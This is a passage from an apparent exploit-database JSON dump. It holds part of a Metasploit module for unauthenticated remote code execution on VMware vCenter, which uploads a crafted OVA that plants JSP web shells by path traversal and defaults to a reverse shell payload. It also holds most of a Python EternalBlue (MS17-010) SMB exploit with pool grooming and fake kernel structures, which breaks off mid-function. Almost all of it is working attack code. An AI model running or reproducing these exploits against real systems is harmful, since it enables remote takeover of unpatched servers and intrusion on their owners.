/home/vsphere-ui/.ssh/authorized_keys\n 'VMware vCenter Server <= 6.7 Update 1b (Linux)',\n {\n 'Platform' => 'linux'\n }\n ],\n [\n 'VMware vCenter Server <= 6.7 Update 3j (Windows)',\n {\n 'Platform' => 'win'\n }\n ]\n ],\n 
'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PAYLOAD' => 'java/jsp_shell_reverse_tcp',\n 'CheckModule' => 'auxiliary/scanner/vmware/esx_fingerprint'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],\n 'RelatedModules' => ['auxiliary/scanner/vmware/esx_fingerprint']\n }\n )\n )\n\n register_options([\n Opt::RPORT(443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n # /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/<index>\n OptInt.new('SprayAndPrayMin', [true, 'Deployer index start', 40]), # mr_me\n OptInt.new('SprayAndPrayMax', [true, 'Deployer index stop', 41]) # wvu\n ])\n end\n\n def spray_and_pray_min\n datastore['SprayAndPrayMin']\n end\n\n def spray_and_pray_max\n datastore['SprayAndPrayMax']\n end\n\n def spray_and_pray_range\n (spray_and_pray_min..spray_and_pray_max).to_a\n end\n\n def check\n # Run auxiliary/scanner/vmware/esx_fingerprint\n super\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/getstatus')\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n case res.code\n when 200\n # {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"}\n expected_keys = [\n 'States',\n 'Install Progress',\n 'Install Final Progress',\n 'Config Progress',\n 'Config Final Progress'\n ]\n\n if (expected_keys & res.get_json_document.keys) == expected_keys\n return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')\n end\n\n CheckCode::Detected('Target did not respond with expected keys.')\n when 401\n CheckCode::Safe('Unauthenticated endpoint access denied.')\n else\n CheckCode::Detected(\"Target responded with code #{res.code}.\")\n end\n end\n\n def exploit\n 
upload_ova\n pop_thy_shell # ;)\n end\n\n def upload_ova\n print_status(\"Uploading OVA file: #{ova_filename}\")\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n generate_ova,\n 'application/x-tar', # OVA is tar\n 'binary',\n %(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'),\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res && res.code == 200 && res.body == 'SUCCESS'\n fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')\n end\n\n register_files_for_cleanup(*jsp_paths)\n\n print_good('Successfully uploaded OVA file')\n end\n\n def pop_thy_shell\n jsp_uri =\n case target['Platform']\n when 'linux'\n normalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\")\n when 'win'\n normalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\")\n end\n\n print_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri\n )\n\n unless res && res.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')\n end\n\n print_good('Successfully requested JSP payload')\n end\n\n def generate_ova\n ova_file = StringIO.new\n\n # HACK: Spray JSP in the OVA and pray we get a shell...\n Rex::Tar::Writer.new(ova_file) do |tar|\n jsp_paths.each do |path|\n # /tmp/unicorn_ova_dir/../../<path>\n tar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) }\n end\n end\n\n ova_file.string\n end\n\n def jsp_paths\n case target['Platform']\n when 'linux'\n @jsp_paths ||= spray_and_pray_range.shuffle.map do |idx|\n \"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\"\n end\n when 'win'\n # Forward slashes work here\n 
[\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"]\n end\n end\n\n def ova_filename\n @ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\"\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35912", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-02-06T07:16:22", "description": "Exploit for windows platform in category remote exploits", "cvss3": {}, "published": "2017-05-19T00:00:00", "type": "zdt", "title": "Microsoft Windows 7 / 2008 R2 (x64) - EternalBlue SMB Remote Code Execution (MS17-010) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-0144"], "modified": "2017-05-19T00:00:00", "id": "1337DAY-ID-27802", "href": "https://0day.today/exploit/description/27802", "sourceData": "#!/usr/bin/python\r\nfrom impacket import smb\r\nfrom struct import pack\r\nimport os\r\nimport sys\r\nimport socket\r\n \r\n'''\r\nEternalBlue exploit for Windows 7/2008 by sleepya\r\nThe exploit might FAIL and CRASH a target system (depended on what is overwritten)\r\n \r\nTested on:\r\n- Windows 7 SP1 x64\r\n- Windows 2008 R2 x64\r\n \r\nReference:\r\n- http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n \r\n \r\nBug detail:\r\n- For the bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/\r\n- You can see SrvOs2FeaListToNt(), SrvOs2FeaListSizeToNt() and SrvOs2FeaToNt() functions logic from WinNT4 source code\r\n https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/ea.c#L263\r\n- In vulnerable SrvOs2FeaListSizeToNt() function, there is a important change from WinNT4 in for loop. 
The psuedo code is here.\r\n if (nextFea > lastFeaStartLocation) {\r\n // this code is for shrinking FeaList->cbList because last fea is invalid.\r\n // FeaList->cbList is DWORD but it is cast to WORD.\r\n *(WORD *)FeaList = (BYTE*)fea - (BYTE*)FeaList;\r\n return size;\r\n }\r\n- Here is related struct info.\r\n#####\r\ntypedef struct _FEA { /* fea */\r\n BYTE fEA; /* flags */\r\n BYTE cbName; /* name length not including NULL */\r\n USHORT cbValue; /* value length */\r\n} FEA, *PFEA;\r\n \r\ntypedef struct _FEALIST { /* feal */\r\n DWORD cbList; /* total bytes of structure including full list */\r\n FEA list[1]; /* variable length FEA structures */\r\n} FEALIST, *PFEALIST;\r\n \r\ntypedef struct _FILE_FULL_EA_INFORMATION {\r\n ULONG NextEntryOffset;\r\n UCHAR Flags;\r\n UCHAR EaNameLength;\r\n USHORT EaValueLength;\r\n CHAR EaName[1];\r\n} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;\r\n######\r\n \r\n \r\nExploit info:\r\n- I do not reverse engineer any x86 binary so I do not know about exact offset.\r\n- The exploit use heap of HAL (address 0xffffffffffd00010 on x64) for placing fake struct and shellcode.\r\n This memory page is executable on Windows 7 and Wndows 2008.\r\n- The important part of feaList and fakeStruct is copied from NSA exploit which works on both x86 and x64.\r\n- The exploit trick is same as NSA exploit\r\n- The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.\r\n- If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)\r\n- See the code and comment for exploit detail.\r\n \r\n \r\nsrvnet buffer info:\r\n- srvnet buffer contains a pointer to another struct and MDL about received buffer\r\n - Controlling MDL values results in arbitrary write\r\n - Controlling pointer to fake struct results in code execution because there is pointer to function\r\n- A srvnet buffer is created after target receiving first 4 bytes\r\n - First 4 bytes contains length of SMB message\r\n 
- The possible srvnet buffer size is \"..., 0x8???, 0x11000, 0x21000, ...\". srvnet.sys will select the size that big enough.\r\n- After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message\r\n- SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler()\r\n- SrvNetCommonReceiveHandler() passes SMB message to SMB handler\r\n - If a pointer in srvnet buffer is modified to fake struct, we can make SrvNetCommonReceiveHandler() call our shellcode\r\n - If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called\r\n - Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen.\r\n - Memory leak is ok to be ignored\r\n'''\r\n \r\n# wanted overflown buffer size (this exploit support only 0x10000 and 0x11000)\r\n# the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time\r\n# the size 0x11000 is used in nsa exploit. this size is more reliable.\r\nNTFEA_SIZE = 0x11000\r\n# the NTFEA_SIZE above is page size. 
We need to use most of last page preventing any data at the end of last page\r\n \r\nntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde\r\n \r\nntfea11000 = (pack('<BBH', 0, 0, 0) + '\\x00')*600 # with these fea, ntfea size is 0x1c20\r\nntfea11000 += pack('<BBH', 0, 0, 0xf3bd) + 'A'*0xf3be # 0x10fe8 - 0x1c20 - 0xc = 0xf3bc\r\n \r\nntfea1f000 = (pack('<BBH', 0, 0, 0) + '\\x00')*0x2494 # with these fea, ntfea size is 0x1b6f0\r\nntfea1f000 += pack('<BBH', 0, 0, 0x48ed) + 'A'*0x48ee # 0x1ffe8 - 0x1b6f0 - 0xc = 0x48ec\r\n \r\nntfea = { 0x10000 : ntfea10000, 0x11000 : ntfea11000 }\r\n \r\n'''\r\nReverse from srvnet.sys (Win7 x64)\r\n- SrvNetAllocateNonPagedBufferInternal() and SrvNetWskReceiveComplete():\r\n \r\n// for x64\r\nstruct SRVNET_BUFFER {\r\n // offset from POOLHDR: 0x10\r\n USHORT flag;\r\n char pad[2];\r\n char unknown0[12];\r\n // offset from SRVNET_POOLHDR: 0x20\r\n LIST_ENTRY list;\r\n // offset from SRVNET_POOLHDR: 0x30\r\n char *pnetBuffer;\r\n DWORD netbufSize; // size of netBuffer\r\n DWORD ioStatusInfo; // copy value of IRP.IOStatus.Information\r\n // offset from SRVNET_POOLHDR: 0x40\r\n MDL *pMdl1; // at offset 0x70\r\n DWORD nByteProcessed;\r\n DWORD pad3;\r\n // offset from SRVNET_POOLHDR: 0x50\r\n DWORD nbssSize; // size of this smb packet (from user)\r\n DWORD pad4;\r\n QWORD pSrvNetWekStruct; // want to change to fake struct address\r\n // offset from SRVNET_POOLHDR: 0x60\r\n MDL *pMdl2;\r\n QWORD unknown5;\r\n // offset from SRVNET_POOLHDR: 0x70\r\n // MDL mdl1; // for this srvnetBuffer (so its pointer is srvnetBuffer address)\r\n // MDL mdl2;\r\n // char transportHeader[0x50]; // 0x50 is TRANSPORT_HEADER_SIZE\r\n // char netBuffer[0];\r\n};\r\n \r\nstruct SRVNET_POOLHDR {\r\n DWORD size;\r\n char unknown[12];\r\n SRVNET_BUFFER hdr;\r\n};\r\n'''\r\n# Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing\r\n# Here is the important fields on x64\r\n# - offset 
0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.\r\n# The value MUST point to valid (might be fake) struct.\r\n# - offset 0x70 (MDL) : MDL for describe receiving SMB request buffer\r\n# - 0x70 (VOID*) : MDL.Next should be NULL\r\n# - 0x78 (USHORT) : MDL.Size should be some value that not too small\r\n# - 0x7a (USHORT) : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)\r\n# - 0x80 (VOID*) : MDL.Process should be NULL\r\n# - 0x88 (VOID*) : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.\r\n# The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).\r\n# \r\n#\r\n# To free the corrupted srvnet buffer, shellcode MUST modify some memory value to satisfy condition.\r\n# Here is related field for freeing corrupted buffer\r\n# - offset 0x10 (USHORT): be 0xffff to make SrvNetFreeBuffer() really free the buffer (else buffer is pushed to srvnet lookaside)\r\n# a corrupted buffer MUST not be reused.\r\n# - offset 0x48 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0\r\n# before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to\r\n# your shellcode as function argument\r\n# - offset 0x60 (PMDL) : points to any fake MDL with MDL.Flags 0x20 does not set\r\n# The last condition is your shellcode MUST return non-negative value. 
The easiest way to do is \"xor eax,eax\" before \"ret\".\r\n# Here is x64 assembly code for setting nByteProcessed field\r\n# - fetch SRVNET_BUFFER address from function argument\r\n# \\x48\\x8b\\x54\\x24\\x40 mov rdx, [rsp+0x40]\r\n# - set nByteProcessed for trigger free after return\r\n# \\x8b\\x4a\\x2c mov ecx, [rdx+0x2c]\r\n# \\x89\\x4a\\x38 mov [rdx+0x38], ecx\r\n \r\nTARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010\r\nTARGET_HAL_HEAP_ADDR_x86 = 0xffdff000\r\n \r\nfakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2\r\nfakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2\r\nfakeSrvNetBufferNsa += '\\x00'*16\r\nfakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20)\r\nfakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0xffffffff, 0x60, 0x1004, 0) # _, x86 MDL.Next, .Size, .MdlFlags, .Process\r\nfakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64) # x86 MDL.MappedSystemVa, _, x64 pointer to fake struct\r\nfakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # x64 pmdl2\r\n# below 0x20 bytes is overwritting MDL\r\n# NSA exploit overwrite StartVa, ByteCount, ByteOffset fields but I think no need because ByteCount is always big enough\r\nfakeSrvNetBufferNsa += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\nfakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa\r\n \r\n# below is for targeting x64 only (all x86 related values are set to 0)\r\n# this is for show what fields need to be modified\r\nfakeSrvNetBufferX64 = pack('<II', 0x11000, 0)*2\r\nfakeSrvNetBufferX64 += pack('<HHIQ', 0xffff, 0, 0, 0)\r\nfakeSrvNetBufferX64 += '\\x00'*16\r\nfakeSrvNetBufferX64 += '\\x00'*16\r\nfakeSrvNetBufferX64 += '\\x00'*16 # 0x40\r\nfakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64) # _, _, pointer to fake struct\r\nfakeSrvNetBufferX64 += pack('<QQ', 
TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # pmdl2\r\nfakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\nfakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa\r\n \r\n \r\nfakeSrvNetBuffer = fakeSrvNetBufferNsa\r\n#fakeSrvNetBuffer = fakeSrvNetBufferX64\r\n \r\nfeaList = pack('<I', 0x10000) # the max value of feaList size is 0x10000 (the only value that can trigger bug)\r\nfeaList += ntfea[NTFEA_SIZE]\r\n# Note:\r\n# - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively\r\n# - x64: below fea will be copy to offset 0x11000 of overflow buffer\r\n# - x86: below fea will be copy to offset 0x10ff8 of overflow buffer\r\nfeaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer)-1) + fakeSrvNetBuffer # -1 because first '\\x00' is for name\r\n# stop copying by invalid flag (can be any value except 0 and 0x80)\r\nfeaList += pack('<BBH', 0x12, 0x34, 0x5678)\r\n \r\n \r\n# fake struct for SrvNetWskReceiveComplete() and SrvNetCommonReceiveHandler()\r\n# x64: fake struct is at ffffffff ffd00010\r\n# offset 0xa0: LIST_ENTRY must be valid address. 
cannot be NULL.\r\n# offset 0x08: set to 3 (DWORD) for invoking ptr to function\r\n# offset 0x1d0: KSPIN_LOCK\r\n# offset 0x1d8: array of pointer to function\r\n#\r\n# code path to get code exection after this struct is controlled\r\n# SrvNetWskReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\r\nfake_recv_struct = pack('<QII', 0, 3, 0)\r\nfake_recv_struct += '\\x00'*16\r\nfake_recv_struct += pack('<QII', 0, 3, 0)\r\nfake_recv_struct += ('\\x00'*16)*7\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0xa0, TARGET_HAL_HEAP_ADDR_x64+0xa0) # offset 0xa0 (LIST_ENTRY to itself)\r\nfake_recv_struct += '\\x00'*16\r\nfake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86+0xc0, TARGET_HAL_HEAP_ADDR_x86+0xc0, 0) # x86 LIST_ENTRY\r\nfake_recv_struct += ('\\x00'*16)*11\r\nfake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x190) # fn_ptr array on x86\r\nfake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86+0x1f0-1, 0) # x86 shellcode address\r\nfake_recv_struct += ('\\x00'*16)*3\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1e0) # offset 0x1d0: KSPINLOCK, fn_ptr array\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1f0-1) # x64 shellcode address - 1 (this value will be increment by one)\r\n \r\n \r\ndef getNTStatus(self):\r\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\r\nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\r\n \r\ndef sendEcho(conn, tid, data):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\r\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\r\n transCommand['Data'] = smb.SMBEcho_Data()\r\n \r\n transCommand['Parameters']['EchoCount'] = 1\r\n transCommand['Data']['Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good ECHO response')\r\n else:\r\n print('got bad ECHO 
response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n \r\n \r\n# do not know why Word Count can be 12\r\n# if word count is not 12, setting ByteCount without enough data will be failed\r\nclass SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):\r\n structure = (\r\n ('MaxBuffer','<H'),\r\n ('MaxMpxCount','<H'),\r\n ('VCNumber','<H'),\r\n ('SessionKey','<L'),\r\n #('AnsiPwdLength','<H'),\r\n ('UnicodePwdLength','<H'),\r\n ('_reserved','<L=0'),\r\n ('Capabilities','<L'),\r\n )\r\n \r\ndef createSessionAllocNonPaged(target, size):\r\n # The big nonpaged pool allocation is in BlockingSessionSetupAndX() function\r\n # You can see the allocation logic (even code is not the same) in WinNT4 source code \r\n # https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071\r\n conn = smb.SMB(target, target)\r\n _, flags2 = conn.get_flags()\r\n # FLAGS2_EXTENDED_SECURITY MUST not be set\r\n flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY\r\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\r\n if size >= 0xffff:\r\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\r\n reqSize = size // 2\r\n else:\r\n flags2 |= smb.SMB.FLAGS2_UNICODE\r\n reqSize = size\r\n conn.set_flags(flags2=flags2)\r\n \r\n pkt = smb.NewSMBPacket()\r\n \r\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\r\n sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()\r\n \r\n sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size\r\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\r\n sessionSetup['Parameters']['VCNumber'] = os.getpid()\r\n sessionSetup['Parameters']['SessionKey'] = 0\r\n sessionSetup['Parameters']['AnsiPwdLength'] = 0\r\n sessionSetup['Parameters']['UnicodePwdLength'] = 0\r\n sessionSetup['Parameters']['Capabilities'] = 0x80000000\r\n \r\n # set ByteCount here\r\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\r\n 
pkt.addCommand(sessionSetup)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('SMB1 session setup allocate nonpaged pool success')\r\n else:\r\n print('SMB1 session setup allocate nonpaged pool failed')\r\n return conn\r\n \r\n \r\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\r\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\r\nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\r\n structure = (\r\n ('TotalParameterCount','<H=0'),\r\n ('TotalDataCount','<H'),\r\n ('ParameterCount','<H=0'),\r\n ('ParameterOffset','<H=0'),\r\n ('ParameterDisplacement','<H=0'),\r\n ('DataCount','<H'),\r\n ('DataOffset','<H'),\r\n ('DataDisplacement','<H=0'),\r\n ('FID','<H=0'),\r\n )\r\n \r\ndef send_trans2_second(conn, tid, data, displacement):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n # assume no params\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\r\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\r\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\r\n \r\n transCommand['Parameters']['TotalParameterCount'] = 0\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+18\r\n transCommand['Data']['Pad1'] = ''\r\n \r\n transCommand['Parameters']['ParameterCount'] = 0\r\n transCommand['Parameters']['ParameterOffset'] = 0\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - fixedOffset % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = len(data)\r\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\r\n transCommand['Parameters']['DataDisplacement'] = displacement\r\n \r\n transCommand['Data']['Trans_Parameters'] = ''\r\n transCommand['Data']['Trans_Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n \r\n \r\ndef 
send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n command = pack('<H', setup)\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\r\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\r\n transCommand['Parameters']['MaxSetupCount'] = 1\r\n transCommand['Parameters']['MaxParameterCount'] = len(param)\r\n transCommand['Parameters']['MaxDataCount'] = 0\r\n transCommand['Data'] = smb.SMBTransaction2_Data()\r\n \r\n transCommand['Parameters']['Setup'] = command\r\n transCommand['Parameters']['TotalParameterCount'] = len(param)\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+38 + len(command)\r\n if len(param) > 0:\r\n padLen = (4 - fixedOffset % 4 ) % 4\r\n padBytes = '\\xFF' * padLen\r\n transCommand['Data']['Pad1'] = padBytes\r\n else:\r\n transCommand['Data']['Pad1'] = ''\r\n padLen = 0\r\n \r\n transCommand['Parameters']['ParameterCount'] = len(param)\r\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\r\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\r\n \r\n transCommand['Data']['Trans_Parameters'] = param\r\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n conn.recvSMB() # must be success\r\n \r\n i = firstDataFragmentSize\r\n while i < len(data):\r\n sendSize = min(4096, len(data) - i)\r\n if len(data) - i <= 4096:\r\n if not sendLastChunk:\r\n break\r\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\r\n i += sendSize\r\n \r\n if sendLastChunk:\r\n 
conn.recvSMB()\r\n return i\r\n \r\n \r\n# connect to target and send a large nbss size with data 0x80 bytes\r\n# this method is for allocating big nonpaged pool (no need to be same size as overflow buffer) on target\r\n# a nonpaged pool is allocated by srvnet.sys that started by useful struct (especially after overwritten)\r\ndef createConnectionWithBigSMBFirst80(target):\r\n # https://msdn.microsoft.com/en-us/library/cc246496.aspx\r\n # Above link is about SMB2, but the important here is first 4 bytes.\r\n # If using wireshark, you will see the StreamProtocolLength is NBSS length.\r\n # The first 4 bytes is same for all SMB version. It is used for determine the SMB message length.\r\n #\r\n # After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message.\r\n # srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message.\r\n # Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too.\r\n sk = socket.create_connection((target, 445))\r\n # For this exploit, use size is 0x11000\r\n pkt = '\\x00' + '\\x00' + pack('>H', 0xfff7)\r\n # There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.\r\n # Also this is invalid SMB2 message.\r\n # I believe NSA exploit use SMB2 for hiding alert from IDS\r\n #pkt += '\\xffSMB' # smb2\r\n # it can be anything even it is invalid\r\n pkt += 'BAAD' # can be any\r\n pkt += '\\x00'*0x7c\r\n sk.send(pkt)\r\n return sk\r\n \r\n \r\ndef exploit(target, shellcode, numGroomConn):\r\n # force using smb.SMB for SMB1\r\n conn = smb.SMB(target, target)\r\n \r\n # can use conn.login() for ntlmv2\r\n conn.login_standard('', '')\r\n server_os = conn.get_server_os()\r\n print('Target OS: '+server_os)\r\n if not (server_os.startswith(\"Windows 7 \") or server_os.startswith(\"Windows Server 2008 \")):\r\n print('This exploit does not support this target')\r\n sys.exit()\r\n \r\n \r\n tid = 
conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n \r\n # Here is code path in WinNT4 (all reference files are relative path to https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/)\r\n # - SrvSmbNtTransaction() (smbtrans.c#L2677)\r\n # - When all data is received, call ExecuteTransaction() at (smbtrans.c#L3113)\r\n # - ExecuteTransaction() (smbtrans.c#L82)\r\n # - Call dispatch table (smbtrans.c#L347)\r\n # - Dispatch table is defined at srvdata.c#L972 (target is command 0, SrvSmbOpen2() function)\r\n # - SrvSmbOpen2() (smbopen.c#L1002)\r\n # - call SrvOs2FeaListToNt() (smbopen.c#L1095)\r\n \r\n # https://msdn.microsoft.com/en-us/library/ee441720.aspx\r\n # Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command\r\n # Note: cannot use SMB_COM_TRANSACTION2 for the exploit because the TotalDataCount field is USHORT\r\n # Note: transaction max data count is 66512 (0x103d0) and DataDisplacement is USHORT\r\n progress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, 2000, False)\r\n # we have to know what size of NtFeaList will be created when last fragment is sent\r\n \r\n # make sure server recv all payload before starting allocate big NonPaged\r\n #sendEcho(conn, tid, 'a'*12)\r\n \r\n # create buffer size NTFEA_SIZE-0x1000 at server\r\n # this buffer MUST NOT be big enough for overflown buffer\r\n allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)\r\n \r\n # groom nonpaged pool\r\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\r\n srvnetConn = []\r\n for i in range(numGroomConn):\r\n sk = createConnectionWithBigSMBFirst80(target)\r\n srvnetConn.append(sk)\r\n \r\n # create buffer size NTFEA_SIZE at server\r\n # this buffer will be replaced by overflown buffer\r\n holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)\r\n # disconnect allocConn to free buffer\r\n # expect small nonpaged pool 
